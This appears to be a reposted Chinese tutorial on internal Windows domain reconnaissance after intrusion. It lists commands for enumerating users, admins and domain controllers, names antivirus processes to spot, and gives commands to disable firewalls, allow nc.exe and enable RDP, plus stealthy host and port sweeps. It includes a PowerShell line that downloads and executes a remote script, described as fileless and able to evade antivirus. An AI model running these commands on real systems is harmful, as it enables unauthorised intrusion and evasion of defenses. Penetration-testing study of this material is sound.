内网安全学习从入门到入狱-知识-内网信息探测与收集
程序员文章站
2022-05-15 22:08:58
...
内网安全学习从入门到入狱-知识-内网信息收集
内网信息收集-工作组和域内基本信息收集
- 前提准备
本文中PowerShell脚本可以自行下载
https://github.com/PowerShellMafia/PowerSploit
0x01本机检查–先看看我是谁
域内的主机一般都是批量的,所以我们看看我们自己,基本上大家也就是差不多的情况
先看看ip,看看网卡,内外网情况,IP段记录一下,DNS
ipconfig /all
查看用户列表
net user
查看在线的用户
query user || qwinsta
查看本机管理员
net localgroup administrators
看管理员进程
tasklist /v
域管理进程 hack\adminishtartor
还有一些常见杀软
360sd…EXE | 360 |
---|---|
360tray.EXE | 360 |
ZHUDONGFANGYU.EXE | 360 |
KSAFETRAY.EXE | 金山 |
MACAFEE MCSHIELD.EXE | MacAfee |
AVP.EXE | K卡巴斯基 |
AVGGUARD.EXE | 小红伞 |
EGUI.EXE | Nod32 |
- 查看进程 too
wmic process list brief
- 查看端口
netstat -ano
systeminfo 或者 wmic qfe get Caption,Description,HotFixID,InstalledOn
-
查看共享列表
net share wmic share get name,path,status
(1)关闭防火墙
Windows Server 2003 系统及之前版本
netsh firewall set opmode disable
Windows Server 2003 之后系统版本,命令如下。
netsh advfirewall set allprofiles state off
- 修改防火墙配置
Windows Server 2003 系统及之前版本,允许指定程序全部连接,命令如下。
netsh firewall add allowedprogram c:\nc.exe “allow nc” enable
Windows Server 2003 之后系统版本,情况如下。
允许指定程序连入,命令如下。
netsh advfirewall firewall add rule name="pass nc" dir=in action=allow
program="C: \nc.exe"
允许指定程序连出,命令如下。
netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow
program="C: \nc.exe"
允许 3389 端口放行,命令如下。
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in
localport=3389 action=allow
查询并开启远程连接服务
查看远程连接端口
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
在 Windows Server 2003 中开启 3389 端口
wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
在 Windows Server 2008 和 Windows Server 2012 中开启 3389 端口
一般前两个命令就开启了
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
查询域控制器列表
Net group "Domain Controller" /domain
收集管理员列表
Net group "Domain admins" /domain
- 列出或断开本地计算机和连接的客户端的会话
net session
0x02域内信息收集
查询当前额权限
- 获取域 SID
whoami /all
- 查询指定账户的详细信息。
net user XXX /domain
判断是否有域
主要利用
ifconfig /all
systeminfo
net view /domain 查询域
net view /domain:XXX 查询此域内所有计算机
net group /domain 查询域内所有用户
net config workstation
net time /domain
net group "domain computers" /domain 查询所有域成员计算机
net accounts /domain 获取域密码信息
这个在大型内网,多个域很重要
获取域信任信息
nltest /domain_trusts
查找域控
可以看到域控制器机器名
nltest /DCLIST:hack
查看域控制器的主机
Nslookup -type=SRV _ldap._tcp
获取域内的用户信息
获取域内用户信息
net user /domain
查看存在用户
dsquery user
0x03 域内网存活主机的探测
主机存活扫描
内网探测要点
- 避免使用大流量攻击的软件和图形化的东西
- 避免杀软敏感操作
- 尽量使用系统自带的组件
- 上班和下班多次扫描,可以进行对比网络情况
1.利用netbios快速探测内网
Netbios.exe 192.168.0.1/24
2.利用 ICMP 协议快速探测内网----ping命令主要使用—有的ping不通很正常
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="
3.通过 ARP 扫描探测内网
arp-scan 工具
Arp.exe –t 192.168.1.0/20
Nishang 中的 Invoke-ARPScan.ps1扫描
powershell.exe -exec bypass -Command "& {Import-Module C:\windows\temp\Invoke-ARPScan.ps1; Invoke-ARPScan -CIDR 192.168.1.0/24}" >> C:\windows\temp\log.txt
Empire 中的 arpsan 模块
usemodule situational_awareness/network/arpscan
set Range 192.168.1.0-192.168.0.254
execute
4.利用TCP UDP工具扫描
ScanLine 是一款经典的端口扫描工具 体积小,动静小
scanline -h -t 22,80-89,110,389,445,3389,1099,1433,2049,6379,7001,8080,1521,3306,3389,5432 -u 53,161,137,139 -O c:\windows\temp\log.txt -p 192.168.1.1-254 /b
域内端口扫描
建议 wmi和powershell工具 动静小好
S扫描器
Metasploit 包含多种端口扫描技术,与其他扫描工具接口良好。在 msfconsole 下运行“search portscan”命令,即可进行搜索。
PowerSploit 中的 Invoke-Portscan.ps1 脚本
这个强大之处在于是无文件落地的扫描,很强大,
可以绕过一些杀软
主要机子要联网能连接到 GitHub这个地址
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA c:\windows\temp\res.txt"